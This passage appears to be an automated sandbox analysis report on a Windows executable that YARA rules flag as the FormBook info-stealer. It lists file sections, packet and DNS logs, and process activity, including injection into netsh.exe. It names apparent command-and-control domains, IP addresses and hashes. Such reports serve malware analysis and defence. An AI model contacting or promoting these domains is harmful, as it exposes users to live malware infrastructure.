                                                                                                    .text0x20000x996e40x998006d9456d015054223a50697288d2ae862False0.7322914546009772data7.633926656601929IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x9c0000x6420x800af09505b4658a694da8a50f0e7f65376False0.349609375data3.5330423110083116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x9e0000xc0x200e968bd63315dda314fc03eb83b10c2fdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0x9c0a00x3b8COM executable for DOS0.42436974789915966
                                                                                                    RT_MANIFEST0x9c4580x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    May 2, 2024 08:24:43.249557972 CEST4973680192.168.2.4148.251.36.121
                                                                                                    May 2, 2024 08:24:43.424362898 CEST8049736148.251.36.121192.168.2.4
                                                                                                    May 2, 2024 08:24:43.424546957 CEST4973680192.168.2.4148.251.36.121
                                                                                                    May 2, 2024 08:24:43.587449074 CEST4973680192.168.2.4148.251.36.121
                                                                                                    May 2, 2024 08:24:43.762599945 CEST8049736148.251.36.121192.168.2.4
                                                                                                    May 2, 2024 08:24:43.763344049 CEST8049736148.251.36.121192.168.2.4
                                                                                                    May 2, 2024 08:24:43.763531923 CEST8049736148.251.36.121192.168.2.4
                                                                                                    May 2, 2024 08:24:43.763606071 CEST4973680192.168.2.4148.251.36.121
                                                                                                    May 2, 2024 08:24:44.548010111 CEST4973680192.168.2.4148.251.36.121
                                                                                                    May 2, 2024 08:24:44.722882986 CEST8049736148.251.36.121192.168.2.4
                                                                                                    May 2, 2024 08:25:02.053174019 CEST4973880192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:02.264493942 CEST8049738194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:02.264668941 CEST4973880192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:02.266545057 CEST4973880192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:02.475363970 CEST8049738194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:02.513768911 CEST8049738194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:02.513788939 CEST8049738194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:02.513833046 CEST4973880192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:03.779613972 CEST4973880192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:04.798501015 CEST4973980192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:05.002785921 CEST8049739194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:05.002911091 CEST4973980192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:05.004878998 CEST4973980192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:05.208945036 CEST8049739194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:05.224226952 CEST8049739194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:05.224246025 CEST8049739194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:05.224351883 CEST4973980192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:05.225511074 CEST4973980192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:06.628921986 CEST4973980192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:09.596995115 CEST4974080192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:09.801656961 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:09.801799059 CEST4974080192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:09.804352999 CEST4974080192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:10.009121895 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.009144068 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.009156942 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.009166956 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.009188890 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.009258986 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.009270906 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.009371042 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.009432077 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.032634020 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.032651901 CEST8049740194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:10.032741070 CEST4974080192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:11.310885906 CEST4974080192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:12.329361916 CEST4974180192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:12.531092882 CEST8049741194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:12.531203032 CEST4974180192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:12.829895973 CEST4974180192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:13.031876087 CEST8049741194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:13.080692053 CEST8049741194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:13.080713987 CEST8049741194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:13.080780029 CEST4974180192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:13.792197943 CEST4974180192.168.2.4194.58.112.173
                                                                                                    May 2, 2024 08:25:13.993874073 CEST8049741194.58.112.173192.168.2.4
                                                                                                    May 2, 2024 08:25:19.750816107 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:19.958864927 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:19.959019899 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:19.965226889 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.173122883 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.175931931 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.175975084 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.175988913 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176024914 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.176028967 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176043987 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176070929 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.176079988 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176120043 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.176145077 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176199913 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176213026 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176227093 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.176242113 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.176259995 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384119987 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384149075 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384219885 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384248018 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384330988 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384344101 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384378910 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384380102 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384454966 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384501934 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384520054 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384532928 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384572983 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384588003 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384602070 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384637117 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384661913 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384722948 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384762049 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384785891 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384841919 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384880066 CEST4974280192.168.2.4195.24.68.5
                                                                                                    May 2, 2024 08:25:20.384896994 CEST8049742195.24.68.5192.168.2.4
                                                                                                    May 2, 2024 08:25:20.384965897 CEST8049742195.24.68.5192.168.2.4

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    May 2, 2024 08:24:42.305643082 CEST6184053192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:24:43.243988991 CEST53618401.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:00.439603090 CEST6327553192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:01.043719053 CEST53632751.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:18.798521042 CEST5142353192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:19.747693062 CEST53514231.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:33.814400911 CEST4966253192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:34.013406992 CEST53496621.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:25:51.518388987 CEST6130853192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:25:51.734960079 CEST53613081.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:05.378520966 CEST6490953192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:05.568423986 CEST53649091.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:19.580396891 CEST5200153192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:20.311863899 CEST53520011.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:36.080804110 CEST6425753192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:36.639506102 CEST53642571.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:26:51.503310919 CEST5488353192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:26:52.157618999 CEST53548831.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:07.446336031 CEST5517453192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:07.570497036 CEST53551741.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:15.830028057 CEST6472853192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:16.118583918 CEST53647281.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:30.429325104 CEST6103553192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:30.992764950 CEST53610351.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:39.048943996 CEST6009253192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:39.328984022 CEST53600921.1.1.1192.168.2.4
                                                                                                    May 2, 2024 08:27:57.249764919 CEST5742353192.168.2.41.1.1.1
                                                                                                    May 2, 2024 08:27:57.446818113 CEST53574231.1.1.1192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    May 2, 2024 08:24:42.305643082 CEST192.168.2.41.1.1.10xf080Standard query (0)www.vavada-band.ruA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:00.439603090 CEST192.168.2.41.1.1.10xcb70Standard query (0)www.bettaroom.ruA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:18.798521042 CEST192.168.2.41.1.1.10xa6afStandard query (0)www.dhleba51.ruA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:33.814400911 CEST192.168.2.41.1.1.10xfbd3Standard query (0)www.dainikmirpur.comA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:51.518388987 CEST192.168.2.41.1.1.10x2cc1Standard query (0)www.whirledairlines.comA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:05.378520966 CEST192.168.2.41.1.1.10x31aStandard query (0)www.quantummquest.topA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:19.580396891 CEST192.168.2.41.1.1.10x9a84Standard query (0)www.yamiyasheec.onlineA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:36.080804110 CEST192.168.2.41.1.1.10xb152Standard query (0)www.applesolve.comA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:51.503310919 CEST192.168.2.41.1.1.10x839aStandard query (0)www.xxaiai.topA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:07.446336031 CEST192.168.2.41.1.1.10x5260Standard query (0)www.vaesen.netA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:15.830028057 CEST192.168.2.41.1.1.10xe6b5Standard query (0)www.dk48.lolA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:30.429325104 CEST192.168.2.41.1.1.10x7837Standard query (0)www.cluird.cloudA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:39.048943996 CEST192.168.2.41.1.1.10xa81dStandard query (0)www.cucuzeus88.storeA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:57.249764919 CEST192.168.2.41.1.1.10xee7bStandard query (0)www.bnbuotqakx.shopA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    May 2, 2024 08:24:43.243988991 CEST1.1.1.1192.168.2.40xf080No error (0)www.vavada-band.ruvavada-band.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:24:43.243988991 CEST1.1.1.1192.168.2.40xf080No error (0)vavada-band.ru148.251.36.121A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:01.043719053 CEST1.1.1.1192.168.2.40xcb70No error (0)www.bettaroom.ru194.58.112.173A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:19.747693062 CEST1.1.1.1192.168.2.40xa6afNo error (0)www.dhleba51.ru195.24.68.5A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:34.013406992 CEST1.1.1.1192.168.2.40xfbd3No error (0)www.dainikmirpur.comdainikmirpur.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:34.013406992 CEST1.1.1.1192.168.2.40xfbd3No error (0)dainikmirpur.com192.250.235.36A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:25:51.734960079 CEST1.1.1.1192.168.2.40x2cc1No error (0)www.whirledairlines.com216.40.34.41A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:05.568423986 CEST1.1.1.1192.168.2.40x31aNo error (0)www.quantummquest.top203.161.50.127A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:20.311863899 CEST1.1.1.1192.168.2.40x9a84No error (0)www.yamiyasheec.onlineyamiyasheec.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:20.311863899 CEST1.1.1.1192.168.2.40x9a84No error (0)yamiyasheec.online119.18.54.116A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:36.639506102 CEST1.1.1.1192.168.2.40xb152No error (0)www.applesolve.comapplesolve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:36.639506102 CEST1.1.1.1192.168.2.40xb152No error (0)applesolve.com188.116.38.155A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:26:52.157618999 CEST1.1.1.1192.168.2.40x839aNo error (0)www.xxaiai.top108.186.8.158A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:07.570497036 CEST1.1.1.1192.168.2.40x5260Name error (3)www.vaesen.netnonenoneA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:16.118583918 CEST1.1.1.1192.168.2.40xe6b5No error (0)www.dk48.lolparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:16.118583918 CEST1.1.1.1192.168.2.40xe6b5No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:30.992764950 CEST1.1.1.1192.168.2.40x7837Name error (3)www.cluird.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:39.328984022 CEST1.1.1.1192.168.2.40xa81dNo error (0)www.cucuzeus88.storecucuzeus88.storeCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:39.328984022 CEST1.1.1.1192.168.2.40xa81dNo error (0)cucuzeus88.store153.92.8.41A (IP address)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:57.446818113 CEST1.1.1.1192.168.2.40xee7bNo error (0)www.bnbuotqakx.shopbnbuotqakx.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                    May 2, 2024 08:27:57.446818113 CEST1.1.1.1192.168.2.40xee7bNo error (0)bnbuotqakx.shop101.99.93.157A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • www.vavada-band.ru
                                                                                                    • www.bettaroom.ru
                                                                                                    • www.dhleba51.ru
                                                                                                    • www.dainikmirpur.com
                                                                                                    • www.whirledairlines.com
                                                                                                    • www.quantummquest.top
                                                                                                    • www.yamiyasheec.online
                                                                                                    • www.applesolve.com
                                                                                                    • www.xxaiai.top
                                                                                                    • www.dk48.lol
                                                                                                    • www.cucuzeus88.store
                                                                                                    • www.bnbuotqakx.shop

                                                                                                    Statistics

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:08:23:52
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Users\user\Desktop\yZcecBUXN7.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\yZcecBUXN7.exe"
                                                                                                    Imagebase:0x6d0000
                                                                                                    File size:631'808 bytes
                                                                                                    MD5 hash:9CD48F0D93C28AE6559409DE23414554
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:08:23:52
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Users\user\Desktop\yZcecBUXN7.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\yZcecBUXN7.exe"
                                                                                                    Imagebase:0x690000
                                                                                                    File size:631'808 bytes
                                                                                                    MD5 hash:9CD48F0D93C28AE6559409DE23414554
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:08:24:07
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe"
                                                                                                    Imagebase:0x40000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:08:24:12
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                                                                    Imagebase:0x1560000
                                                                                                    File size:82'432 bytes
                                                                                                    MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:08:24:27
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe"
                                                                                                    Imagebase:0x40000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:08:24:50
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                    Imagebase:0x7ff72bec0000
                                                                                                    File size:676'768 bytes
                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    No disassembly